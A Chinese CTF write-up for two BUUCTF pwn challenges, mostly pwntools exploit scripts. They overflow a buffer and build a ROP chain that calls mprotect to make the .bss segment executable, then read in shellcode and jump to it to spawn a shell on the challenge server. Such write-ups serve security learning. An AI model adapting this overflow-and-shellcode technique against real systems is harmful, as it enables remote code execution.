get_started_3dsctf_2016
直接调用if里面的函数,但是本地可以通,远程却打不通
from pwn import * #r=remote('node3.buuoj.cn',25775) r=process('./get_started_3dsctf_2016') get_flag=0x80489b8 payload='a'*0x38+p32(get_flag) r.sendline(payload) r.interactive()
不过程序里面有mprotect函数,它可以修改程序内存里面的权限
int mprotect(const void *start, size_t len, int prot); #start是要修改的起始的内存地址 #len是修改的长度 #prot修改的权限
可以利用mprotect函数修改bss段的权限,让其有执行权限,再用read写入shellcode,然后跳转到bss段执行来getshell
详情步骤参考这里
from pwn import * context(arch='i386',os='linux') r=remote('node3.buuoj.cn',25775) elf=ELF('./get_started_3dsctf_2016') mprotect_addr=elf.symbols['mprotect'] read_addr=elf.symbols['read'] main_addr=elf.symbols['main'] ppp3_addr=0x080483b8 mpr_start=0x80eb000 mpr_len=0x1000 mpr_prot=7 #rxw=7 shellcode=asm(shellcraft.sh()) payload='a'*0x38 payload+=p32(mprotect_addr)+p32(ppp3_addr)+p32(mpr_start)+p32(mpr_len)+p32(mpr_prot) payload+=p32(read_addr)+p32(ppp3_addr)+p32(0x0)+p32(mpr_start)+p32(len(shellcode)) payload+=p32(mpr_start) r.sendline(payload) r.sendline(shellcode) r.interactive()
not_the_same_3dsctf_2016
一样的配方,参数不一样
from pwn import * context(arch='i386',os='linux') r=remote('node3.buuoj.cn',28393) elf=ELF('./not_the_same_3dsctf_2016') read_addr=elf.symbols['read'] mprotect_addr=elf.symbols['mprotect'] ppp3_ret=0x080483b8 mpr_start=0x080eb000 mpr_len=0x1000 mpr_prot=7 shellcode=asm(shellcraft.sh()) payload='a'*0x2d payload+=p32(mprotect_addr)+p32(ppp3_ret)+p32(mpr_start)+p32(mpr_len)+p32(mpr_prot) payload+=p32(read_addr)+p32(ppp3_ret)+p32(0x0)+p32(mpr_start)+p32(len(shellcode)) payload+=p32(mpr_start) r.sendline(payload) r.sendline(shellcode) r.interactive()
